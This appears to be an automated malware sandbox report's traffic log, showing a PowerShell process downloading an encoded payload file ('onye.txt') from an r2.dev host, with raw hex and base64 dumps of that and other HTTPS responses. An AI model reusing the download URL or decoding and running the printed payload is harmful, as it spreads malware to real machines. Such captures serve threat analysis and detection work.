                                                                                    2024-10-02 03:23:12 UTC16384INData Raw: 2f 2f 2f 77 41 52 42 47 39 49 49 77 41 47 62 33 51 41 41 41 6f 54 42 53 41 46 41 41 41 41 4f 44 48 2f 2f 2f 38 41 4f 4e 73 41 41 41 41 67 43 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 4d 41 45 55 67 41 41 41 41 4f 51 49 41 41 47 34 43 41 41 42 61 41 51 41 41 66 51 41 41 41 4d 73 43 41 41 43 4d 41 51 41 41 46 41 45 41 41 4a 77 44 41 41 43 55 41 41 41 41 41 51 4d 41 41 4c 77 41 41 41 41 57 41 41 41 41 33 41 49 41 41 4d 63 42 41 41 43 6a 41 51 41 41 53 67 49 41 41 41 55 41 41 41 43 62 41 67 41 41 58 67 41 41 41 49 45 42 41 41 41 38 41 51 41 41 61 77 45 41 41 42 30 44 41 41 44 38 41 41 41 41 66 77 49 41 41 4f 30 42 41 41 44 68 41 41 41 41 53 77 45 41 41 44 51 41 41 41 42 46 41 41 41 41 49 51 41 41 41 42 4d 43 41 41 41 34 4e 41 49 41 41 42 45 49 4f 6a 30 44 41
                                                                                    Data Ascii: ///wARBG9IIwAGb3QAAAoTBSAFAAAAODH///8AONsAAAAgCAAAADgEAAAA/gwMAEUgAAAAOQIAAG4CAABaAQAAfQAAAMsCAACMAQAAFAEAAJwDAACUAAAAAQMAALwAAAAWAAAA3AIAAMcBAACjAQAASgIAAAUAAACbAgAAXgAAAIEBAAA8AQAAawEAAB0DAAD8AAAAfwIAAO0BAADhAAAASwEAADQAAABFAAAAIQAAABMCAAA4NAIAABEIOj0DA
                                                                                    2024-10-02 03:23:12 UTC16384INData Raw: 38 52 43 53 68 31 41 67 41 47 62 7a 49 6a 41 41 59 52 43 57 2f 47 49 67 41 47 4b 48 59 43 41 41 5a 76 4d 69 4d 41 42 69 68 30 41 67 41 47 45 77 38 67 43 51 41 41 41 48 37 46 43 41 41 45 65 38 49 49 41 41 51 36 7a 50 37 2f 2f 79 59 67 44 51 41 41 41 44 6a 42 2f 76 2f 2f 45 51 49 54 41 79 41 49 41 41 41 41 2f 67 34 4b 41 44 69 72 2f 76 2f 2f 4f 42 73 42 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 37 4d 49 41 41 51 36 6c 76 37 2f 2f 79 59 67 41 41 41 41 41 44 69 4c 2f 76 2f 2f 45 51 45 67 70 30 47 63 33 79 41 44 41 41 41 41 59 79 42 63 44 35 4f 49 59 58 37 46 43 41 41 45 65 38 51 49 41 41 52 68 4b 46 51 43 41 41 59 6f 59 77 49 41 42 68 4d 43 49 42 34 41 41 41 41 34 56 2f 37 2f 2f 78 45 48 4f 6c 6f 42 41 41 41 67 43 67 41 41 41 48 37 46 43 41 41 45 65
                                                                                    Data Ascii: 8RCSh1AgAGbzIjAAYRCW/GIgAGKHYCAAZvMiMABih0AgAGEw8gCQAAAH7FCAAEe8IIAAQ6zP7//yYgDQAAADjB/v//EQITAyAIAAAA/g4KADir/v//OBsBAAAgAAAAAH7FCAAEe7MIAAQ6lv7//yYgAAAAADiL/v//EQEgp0Gc3yADAAAAYyBcD5OIYX7FCAAEe8QIAARhKFQCAAYoYwIABhMCIB4AAAA4V/7//xEHOloBAAAgCgAAAH7FCAAEe
                                                                                    2024-10-02 03:23:12 UTC16384INData Raw: 41 41 4f 4d 37 38 2f 2f 38 52 41 54 6b 71 2f 66 2f 2f 49 41 63 41 41 41 42 2b 78 51 67 41 42 48 76 6b 43 41 41 45 4f 72 50 38 2f 2f 38 6d 49 41 49 41 41 41 41 34 71 50 7a 2f 2f 77 41 41 41 52 41 41 41 41 49 41 71 77 44 35 70 41 46 33 41 41 41 41 41 43 5a 2b 6f 51 41 41 42 42 54 2b 41 53 6f 41 41 42 70 2b 6f 51 41 41 42 43 6f 41 4b 76 34 4a 41 41 42 76 5a 51 41 41 43 69 6f 41 4b 76 34 4a 41 41 42 76 54 51 41 41 43 69 6f 41 4c 67 44 2b 43 51 41 41 4b 50 77 6c 41 41 59 71 4c 67 44 2b 43 51 41 41 4b 4c 45 45 41 41 59 71 4b 76 34 4a 41 41 42 76 2b 51 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 2b 41 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 45 43 4d 41 42 69 6f 41 4c 67 44 2b 43 51 41 41 4b 43 55 42 41 41 6f 71 48 67 41 6f 73 41 51 41 42 69 70 4b 2f 67 6b 41 41
                                                                                    Data Ascii: AAOM78//8RATkq/f//IAcAAAB+xQgABHvkCAAEOrP8//8mIAIAAAA4qPz//wAAARAAAAIAqwD5pAF3AAAAACZ+oQAABBT+ASoAABp+oQAABCoAKv4JAABvZQAACioAKv4JAABvTQAACioALgD+CQAAKPwlAAYqLgD+CQAAKLEEAAYqKv4JAABv+QIABioAKv4JAABv+AIABioAKv4JAABvECMABioALgD+CQAAKCUBAAoqHgAosAQABipK/gkAA
                                                                                    2024-10-02 03:23:12 UTC16384INData Raw: 6f 49 41 41 51 36 59 50 2f 2f 2f 79 59 67 43 41 41 41 41 44 68 56 2f 2f 2f 2f 4f 47 30 41 41 41 41 67 42 77 41 41 41 48 37 46 43 41 41 45 65 37 67 49 41 41 51 36 50 50 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 78 2f 2f 2f 2f 41 41 49 6f 43 77 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 75 67 67 41 42 44 6b 57 2f 2f 2f 2f 4a 69 41 42 41 41 41 41 4f 41 76 2f 2f 2f 38 41 49 49 66 62 73 78 73 67 6d 4f 66 75 4f 6c 67 67 64 4f 74 35 55 57 46 2b 78 51 67 41 42 48 73 43 43 51 41 45 59 53 67 37 41 77 41 47 4b 44 77 44 41 41 5a 36 42 47 39 67 41 41 41 4b 46 79 68 76 41 77 41 47 45 77 49 67 42 67 41 41 41 48 37 46 43 41 41 45 65 37 30 49 41 41 51 36 77 66 37 2f 2f 79 59 67 43 51 41 41 41 44 69 32 2f 76 2f 2f 41 41 51 55 2f 67 45 54 41 53 41 44 41 41 41 41 4f
                                                                                    Data Ascii: oIAAQ6YP///yYgCAAAADhV////OG0AAAAgBwAAAH7FCAAEe7gIAAQ6PP///yYgBAAAADgx////AAIoCwMABiACAAAAfsUIAAR7uggABDkW////JiABAAAAOAv///8AIIfbsxsgmOfuOlggdOt5UWF+xQgABHsCCQAEYSg7AwAGKDwDAAZ6BG9gAAAKFyhvAwAGEwIgBgAAAH7FCAAEe70IAAQ6wf7//yYgCQAAADi2/v//AAQU/gETASADAAAAO
                                                                                    2024-10-02 03:23:12 UTC16384INData Raw: 41 41 4f 4b 37 2f 2f 2f 38 52 41 44 70 2f 41 41 41 41 49 41 51 41 41 41 41 34 6e 66 2f 2f 2f 78 45 43 4f 71 49 41 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 38 4d 49 41 41 51 36 67 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 68 33 2f 2f 2f 2f 41 41 49 6f 70 41 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 76 67 67 41 42 44 70 63 2f 2f 2f 2f 4a 69 41 44 41 41 41 41 4f 46 48 2f 2f 2f 38 41 4b 67 41 44 46 43 69 79 41 77 41 47 45 77 41 67 42 51 41 41 41 44 67 37 2f 2f 2f 2f 4f 44 41 41 41 41 41 67 43 41 41 41 41 50 34 4f 41 51 41 34 4a 50 2f 2f 2f 77 41 67 4a 47 76 43 36 53 41 58 47 50 4f 77 59 58 37 46 43 41 41 45 65 38 41 49 41 41 52 68 4b 4b 30 44 41 41 59 6f 73 51 51 41 42 6e 6f 43 65 37 4d 41 41 41 51 54 41 69 41 48 41 41 41 41 4f 50 54 2b 2f
                                                                                    Data Ascii: AAOK7///8RADp/AAAAIAQAAAA4nf///xECOqIAAAAgAAAAAH7FCAAEe8MIAAQ6gv///yYgAAAAADh3////AAIopAMABiACAAAAfsUIAAR7vggABDpc////JiADAAAAOFH///8AKgADFCiyAwAGEwAgBQAAADg7////ODAAAAAgCAAAAP4OAQA4JP///wAgJGvC6SAXGPOwYX7FCAAEe8AIAARhKK0DAAYosQQABnoCe7MAAAQTAiAHAAAAOPT+/
                                                                                    2024-10-02 03:23:12 UTC16384INData Raw: 4d 41 41 41 45 6f 38 67 4d 41 42 69 6a 7a 41 77 41 47 45 78 51 67 42 51 41 41 41 48 37 46 43 41 41 45 65 78 49 4a 41 41 51 36 42 65 66 2f 2f 79 59 67 41 51 41 41 41 44 6a 36 35 76 2f 2f 41 41 4b 6c 6c 51 41 41 41 58 4f 4d 41 51 41 4b 6a 4a 63 41 41 41 45 54 41 79 41 67 41 41 41 41 4f 4e 33 6d 2f 2f 38 41 45 51 48 51 43 67 41 41 41 53 6a 79 41 77 41 47 4b 50 4d 44 41 41 59 54 48 79 41 4b 41 41 41 41 4f 4c 2f 6d 2f 2f 38 34 73 4f 2f 2f 2f 79 41 4c 41 41 41 41 66 73 55 49 41 41 52 37 33 77 67 41 42 44 71 6d 35 76 2f 2f 4a 69 42 4a 41 41 41 41 4f 4a 76 6d 2f 2f 38 34 32 50 72 2f 2f 79 42 32 41 41 41 41 4f 49 7a 6d 2f 2f 38 41 41 6d 38 6c 41 41 41 4b 4b 4b 49 41 41 41 6f 6f 41 41 51 41 42 6f 79 57 41 41 41 42 45 77 4d 67 44 77 41 41 41 50 34 4f 4c 67 41 34 59
                                                                                    Data Ascii: MAAAEo8gMABijzAwAGExQgBQAAAH7FCAAEexIJAAQ6Bef//yYgAQAAADj65v//AAKllQAAAXOMAQAKjJcAAAETAyAgAAAAON3m//8AEQHQCgAAASjyAwAGKPMDAAYTHyAKAAAAOL/m//84sO///yALAAAAfsUIAAR73wgABDqm5v//JiBJAAAAOJvm//842Pr//yB2AAAAOIzm//8AAm8lAAAKKKIAAAooAAQABoyWAAABEwMgDwAAAP4OLgA4Y
                                                                                    2024-10-02 03:23:12 UTC16384INData Raw: 45 41 41 41 42 2b 78 51 67 41 42 48 76 71 43 41 41 45 4f 53 37 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 49 2f 2f 2f 2f 77 41 54 4d 41 51 41 52 67 41 41 41 4d 73 41 41 42 45 41 41 67 4d 45 4b 50 30 42 41 41 6f 41 41 6e 76 38 41 51 41 4b 4f 68 67 41 41 41 41 44 46 6a 38 52 41 41 41 41 41 77 49 6f 2f 67 45 41 43 76 34 43 46 76 34 42 4f 41 45 41 41 41 41 57 43 67 59 35 45 41 41 41 41 41 41 43 65 2f 51 42 41 41 6f 44 42 47 2f 65 41 51 41 4b 41 41 41 71 41 41 41 54 4d 41 51 41 6c 51 45 41 41 41 51 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 43 77 41 41 41 4b 77 41 41 41 43 48 41 41 41 41 30 77 41 41 41 4f 49 41 41 41 42 55 41 41 41 41 4b 51 41 41 41 41 55 41 41 41 42 45 41 41 41 41 47 67 45 41 41 50 51 41 41 41 43 71 41
                                                                                    Data Ascii: EAAAB+xQgABHvqCAAEOS7///8mIAEAAAA4I////wATMAQARgAAAMsAABEAAgMEKP0BAAoAAnv8AQAKOhgAAAADFj8RAAAAAwIo/gEACv4CFv4BOAEAAAAWCgY5EAAAAAACe/QBAAoDBG/eAQAKAAAqAAATMAQAlQEAAAQAABEgAwAAAP4OAAA4AAAAAP4MAABFCwAAAKwAAACHAAAA0wAAAOIAAABUAAAAKQAAAAUAAABEAAAAGgEAAPQAAACqA
                                                                                    2024-10-02 03:23:12 UTC16384INData Raw: 41 44 41 6e 74 45 41 67 41 4b 2f 67 51 4c 42 7a 6b 67 41 41 41 41 41 41 4a 37 52 51 49 41 43 67 4d 43 65 30 55 43 41 41 6f 44 46 31 67 43 65 30 51 43 41 41 6f 44 57 53 6a 51 41 51 41 4b 41 41 41 43 65 30 55 43 41 41 6f 44 42 4b 51 31 41 41 41 62 41 67 4a 37 52 41 49 41 43 68 64 59 66 55 51 43 41 41 6f 71 41 41 41 54 4d 41 4d 41 54 77 41 41 41 41 4d 42 41 42 45 41 41 6e 74 45 41 67 41 4b 43 6a 67 75 41 41 41 41 41 41 59 58 57 51 6f 43 65 30 55 43 41 41 6f 47 6f 7a 55 41 41 42 75 4d 4e 51 41 41 47 77 4f 4d 4e 51 41 41 47 2f 34 42 43 77 63 35 43 41 41 41 41 41 41 47 44 44 67 54 41 41 41 41 41 41 59 57 2f 67 49 4e 43 54 72 48 2f 2f 2f 2f 46 51 77 34 41 41 41 41 41 41 67 71 41 42 4d 77 41 77 41 74 41 41 41 41 62 41 41 41 45 51 41 43 41 79 6a 47 41 51 41 4b 43
                                                                                    Data Ascii: ADAntEAgAK/gQLBzkgAAAAAAJ7RQIACgMCe0UCAAoDF1gCe0QCAAoDWSjQAQAKAAACe0UCAAoDBKQ1AAAbAgJ7RAIAChdYfUQCAAoqAAATMAMATwAAAAMBABEAAntEAgAKCjguAAAAAAYXWQoCe0UCAAoGozUAABuMNQAAGwOMNQAAG/4BCwc5CAAAAAAGDDgTAAAAAAYW/gINCTrH////FQw4AAAAAAgqABMwAwAtAAAAbAAAEQACAyjGAQAKC


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.1049703162.159.140.2374431352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-02 03:23:15 UTC101OUTGET /onye.txt HTTP/1.1
                                                                                    Host: pub-26ee9be236b54d0cb1b570a203543b93.r2.dev
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-02 03:23:16 UTC285INHTTP/1.1 200 OK
                                                                                    Date: Wed, 02 Oct 2024 03:23:16 GMT
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 208216
                                                                                    Connection: close
                                                                                    Accept-Ranges: bytes
                                                                                    ETag: "0a78384fc217b24ca48ff444fb12d8bc"
                                                                                    Last-Modified: Sun, 22 Sep 2024 14:30:17 GMT
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8cc1929d2baade93-EWR
                                                                                    2024-10-02 03:23:16 UTC1369INData Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2024-10-02 03:23:16 UTC1369INData Raw: 34 47 50 6b 78 54 53 38 30 44 50 33 77 44 4c 38 49 43 50 48 73 44 2b 37 49 2f 4f 6a 76 54 32 37 34 37 4f 76 75 54 71 37 6f 35 4f 51 75 54 64 37 59 32 4f 67 74 54 55 37 63 30 4f 73 73 54 48 37 63 78 4f 49 6f 6a 2f 36 4d 75 4f 55 72 6a 7a 36 38 72 4f 31 71 6a 6d 36 6f 6a 4f 77 6f 6a 4a 36 77 68 4f 53 6f 44 43 35 34 66 4f 61 6e 7a 70 35 63 58 4f 48 6c 6a 47 34 51 4f 4f 71 69 44 51 34 6b 7a 4e 6c 66 44 32 33 4d 39 4e 61 65 7a 6b 32 38 70 4e 51 61 6a 67 32 30 6e 4e 68 59 54 45 31 77 66 4e 74 58 7a 35 31 77 64 4e 2b 57 54 72 31 63 61 4e 69 57 7a 4f 31 38 42 4e 62 54 7a 72 7a 77 37 4d 6f 4f 7a 52 7a 6f 7a 4d 31 49 44 2f 79 67 75 4d 59 4c 6a 69 79 4d 6f 4d 61 4a 7a 55 79 45 6b 4d 5a 49 7a 41 78 67 66 4d 6c 48 44 76 78 49 62 4d 6d 47 6a 44 77 67 4e 41 41 45 41 49
                                                                                    Data Ascii: 4GPkxTS80DP3wDL8ICPHsD+7I/OjvT2747OvuTq7o5OQuTd7Y2OgtTU7c0OssTH7cxOIoj/6MuOUrjz68rO1qjm6ojOwojJ6whOSoDC54fOanzp5cXOHljG4QOOqiDQ4kzNlfD23M9Naezk28pNQajg20nNhYTE1wfNtXz51wdN+WTr1caNiWzO18BNbTzrzw7MoOzRzozM1ID/yguMYLjiyMoMaJzUyEkMZIzAxgfMlHDvxIbMmGjDwgNAAEAI
                                                                                    2024-10-02 03:23:16 UTC1369INData Raw: 77 50 4c 2b 44 68 2f 73 33 50 72 39 54 55 2b 63 6d 50 41 30 7a 37 39 59 63 50 38 32 44 6f 39 6f 59 50 72 31 54 5a 39 30 56 50 4e 31 6a 52 39 30 41 50 6d 7a 54 76 38 41 49 50 6f 78 6a 52 38 41 7a 4f 72 76 7a 33 37 73 38 4f 72 75 6a 64 37 55 32 4f 67 73 6a 45 37 67 67 4f 6a 72 6a 5a 36 38 6c 4f 57 70 6a 52 36 63 68 4f 51 6f 7a 42 35 63 66 4f 44 6e 54 69 35 45 59 4f 78 6c 6a 52 35 63 42 4f 36 6a 54 30 34 38 4a 4f 32 68 7a 54 34 77 77 4e 6e 65 7a 59 33 77 30 4e 41 59 54 36 32 30 74 4e 38 61 6a 6b 32 51 6e 4e 65 5a 7a 52 32 30 6a 4e 71 55 7a 37 31 67 62 4e 35 51 6a 71 30 6b 48 4e 66 52 7a 55 30 77 45 4e 35 51 7a 4d 30 49 77 4d 65 50 54 31 7a 45 36 4d 56 4f 54 65 7a 34 31 4d 59 4e 44 50 7a 67 7a 4d 78 4d 7a 4b 7a 55 79 4d 4e 49 7a 36 79 45 75 4d 4c 4c 54 78 79
                                                                                    Data Ascii: wPL+Dh/s3Pr9TU+cmPA0z79YcP82Do9oYPr1TZ90VPN1jR90APmzTv8AIPoxjR8AzOrvz37s8Orujd7U2OgsjE7ggOjrjZ68lOWpjR6chOQozB5cfODnTi5EYOxljR5cBO6jT048JO2hzT4wwNnezY3w0NAYT620tN8ajk2QnNeZzR20jNqUz71gbN5Qjq0kHNfRzU0wEN5QzM0IwMePT1zE6MVOTez41MYNDPzgzMxMzKzUyMNIz6yEuMLLTxy
                                                                                    2024-10-02 03:23:16 UTC1369INData Raw: 4e 45 52 44 4f 30 30 43 4e 4d 4d 6a 2f 7a 67 2b 4d 61 50 7a 72 7a 63 36 4d 4d 4f 44 64 7a 6b 31 4d 44 4e 54 48 79 73 75 4d 43 4c 6a 6f 79 73 6f 4d 46 46 7a 30 78 77 63 4d 2b 46 6a 55 78 73 55 4d 45 46 54 50 78 59 54 4d 76 45 7a 4a 78 30 52 4d 54 45 44 43 78 45 41 4d 38 44 6a 38 77 4d 4f 4d 64 44 6a 31 77 34 4d 4d 41 44 7a 75 77 59 4c 4d 69 43 44 6d 77 4d 4a 4d 4f 43 54 66 77 49 48 4d 6f 42 7a 59 77 67 46 41 41 41 41 35 41 41 41 77 41 41 41 41 39 34 65 50 70 33 44 48 39 59 41 50 5a 78 7a 4c 37 30 39 4f 33 75 6a 6a 37 34 33 4f 6e 74 7a 57 37 34 30 4f 30 73 6a 47 37 30 77 4f 43 6f 54 2f 36 49 76 4f 6e 72 6a 34 36 63 74 4f 4d 72 7a 78 36 77 72 4f 78 71 44 72 36 45 71 4f 57 71 7a 6a 36 67 6f 4f 37 70 6a 64 36 73 6d 4f 67 70 7a 57 36 41 6c 4f 46 70 44 51 36 55
                                                                                    Data Ascii: NERDO00CNMMj/zg+MaPzrzc6MMODdzk1MDNTHysuMCLjoysoMFFz0xwcM+FjUxsUMEFTPxYTMvEzJx0RMTEDCxEAM8Dj8wMOMdDj1w4MMADzuwYLMiCDmwMJMOCTfwIHMoBzYwgFAAAA5AAAwAAAA94ePp3DH9YAPZxzL709O3ujj743OntzW740O0sjG70wOCoT/6IvOnrj46ctOMrzx6wrOxqDr6EqOWqzj6goO7pjd6smOgpzW6AlOFpDQ6U
                                                                                    2024-10-02 03:23:16 UTC1369INData Raw: 56 54 44 30 30 73 4d 4e 2b 53 54 75 30 51 4c 4e 6e 53 6a 6f 30 30 4a 4e 54 53 6a 6a 30 6b 49 4e 56 52 44 55 30 73 45 4e 2b 51 7a 4e 30 49 44 4e 74 51 6a 47 30 55 42 4e 51 4d 7a 35 7a 30 39 4d 54 50 54 79 7a 6b 33 4d 76 4e 54 5a 7a 73 31 4d 2b 4d 44 4e 7a 6f 79 4d 67 4d 6a 46 79 30 75 4d 6a 4c 54 32 79 63 72 4d 74 4b 7a 6f 79 30 6b 4d 47 4a 44 4b 79 51 51 4d 39 48 7a 37 78 55 65 4d 62 48 54 30 78 63 63 4d 39 47 7a 73 78 6b 61 4d 66 47 54 6c 78 41 5a 4d 34 46 44 43 77 30 50 4d 74 44 7a 34 77 77 4e 4d 56 44 44 79 77 41 4c 4d 6a 43 54 6d 77 4d 4a 4d 36 42 54 61 77 30 46 4d 51 42 54 53 77 77 42 4d 4f 41 6a 42 77 41 41 41 41 45 41 73 41 41 41 67 41 41 41 41 2f 73 2f 50 70 2f 6a 30 2f 30 36 50 6e 2b 7a 51 2f 30 79 50 65 34 44 70 2b 6b 6f 50 76 35 54 56 2b 30 6a
                                                                                    Data Ascii: VTD00sMN+STu0QLNnSjo00JNTSjj0kINVRDU0sEN+QzN0IDNtQjG0UBNQMz5z09MTPTyzk3MvNTZzs1M+MDNzoyMgMjFy0uMjLT2ycrMtKzoy0kMGJDKyQQM9Hz7xUeMbHT0xccM9GzsxkaMfGTlxAZM4FDCw0PMtDz4wwNMVDDywALMjCTmwMJM6BTaw0FMQBTSwwBMOAjBwAAAAEAsAAAgAAAA/s/Pp/j0/06Pn+zQ/0yPe4Dp+koPv5TV+0j
                                                                                    2024-10-02 03:23:16 UTC1369INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2024-10-02 03:23:16 UTC1369INData Raw: 66 52 4a 36 4f 56 34 39 46 61 2f 2f 76 2f 34 67 4f 6e 46 6c 6f 55 48 61 70 78 6f 39 2f 2f 2b 58 45 36 6b 57 55 69 51 5a 62 6c 75 6a 32 2f 2f 37 76 55 6f 44 63 52 4a 43 65 4e 77 54 45 61 2f 2f 76 2f 66 68 4f 39 46 6c 34 42 57 4e 59 52 6f 39 2f 2f 2b 7a 47 36 49 55 55 69 47 2b 44 7a 35 68 32 2f 2f 37 66 65 6f 58 2b 55 6b 69 46 61 57 2f 50 55 55 58 55 6a 57 2f 50 55 67 58 55 6a 57 2f 50 41 79 77 66 52 48 62 47 41 78 67 66 52 48 62 47 62 73 78 64 52 48 62 47 5a 75 49 7a 4d 59 58 30 78 79 56 32 63 31 52 64 52 48 44 41 62 6f 58 30 78 6d 78 47 5a 75 77 47 35 46 64 4d 62 6b 52 6e 62 67 58 30 78 73 78 47 5a 75 77 63 52 48 44 46 78 46 31 6f 33 46 68 49 30 46 68 6f 4d 7a 77 57 5a 49 58 30 78 41 50 6a 62 79 56 32 61 45 58 30 78 77 76 34 2f 2f 37 50 36 6f 6a 62 58 4a
                                                                                    Data Ascii: fRJ6OV49Fa//v/4gOnFloUHapxo9//+XE6kWUiQZbluj2//7vUoDcRJCeNwTEa//v/fhO9Fl4BWNYRo9//+zG6IUUiG+Dz5h2//7feoX+UkiFaW/PUUXUjW/PUgXUjW/PAywfRHbGAxgfRHbGbsxdRHbGZuIzMYX0xyV2c1RdRHDAboX0xmxGZuwG5FdMbkRnbgX0xsxGZuwcRHDFxF1o3FhI0FhoMzwWZIX0xAPjbyV2aEX0xwv4//7P6ojbXJ
                                                                                    2024-10-02 03:23:16 UTC1369INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2024-10-02 03:23:16 UTC1369INData Raw: 75 56 47 63 50 52 58 64 50 56 6d 64 68 64 48 41 6c 64 57 59 7a 4e 58 5a 4e 52 58 64 50 56 6d 64 68 64 6e 4c 6b 31 57 62 75 6c 32 64 41 55 32 5a 68 4e 33 63 6c 31 45 64 31 39 55 5a 32 46 32 64 41 55 57 62 31 78 32 62 57 52 58 5a 48 52 58 64 50 56 6d 64 68 64 6e 4c 6b 31 57 62 75 6c 32 64 41 55 57 62 31 78 32 62 57 52 58 5a 48 52 58 64 50 56 6d 64 68 64 48 41 75 39 57 61 30 6c 32 63 76 42 46 64 6c 64 45 64 31 39 55 5a 32 46 32 64 75 51 57 62 74 35 57 61 33 42 67 62 76 6c 47 64 70 4e 33 62 51 52 58 5a 48 52 58 64 50 56 6d 64 68 64 48 41 6c 52 58 59 53 74 32 59 68 4a 57 65 68 78 47 55 30 56 32 52 30 56 33 54 6c 5a 58 59 33 35 43 5a 74 31 6d 62 70 64 48 41 6c 52 58 59 53 74 32 59 68 4a 57 65 68 78 47 55 30 56 32 52 30 56 33 54 6c 5a 58 59 33 42 41 61 6a 52 58
                                                                                    Data Ascii: uVGcPRXdPVmdhdHAldWYzNXZNRXdPVmdhdnLk1Wbul2dAU2ZhN3cl1Ed19UZ2F2dAUWb1x2bWRXZHRXdPVmdhdnLk1Wbul2dAUWb1x2bWRXZHRXdPVmdhdHAu9Wa0l2cvBFdldEd19UZ2F2duQWbt5Wa3BgbvlGdpN3bQRXZHRXdPVmdhdHAlRXYSt2YhJWehxGU0V2R0V3TlZXY35CZt1mbpdHAlRXYSt2YhJWehxGU0V2R0V3TlZXY3BAajRX
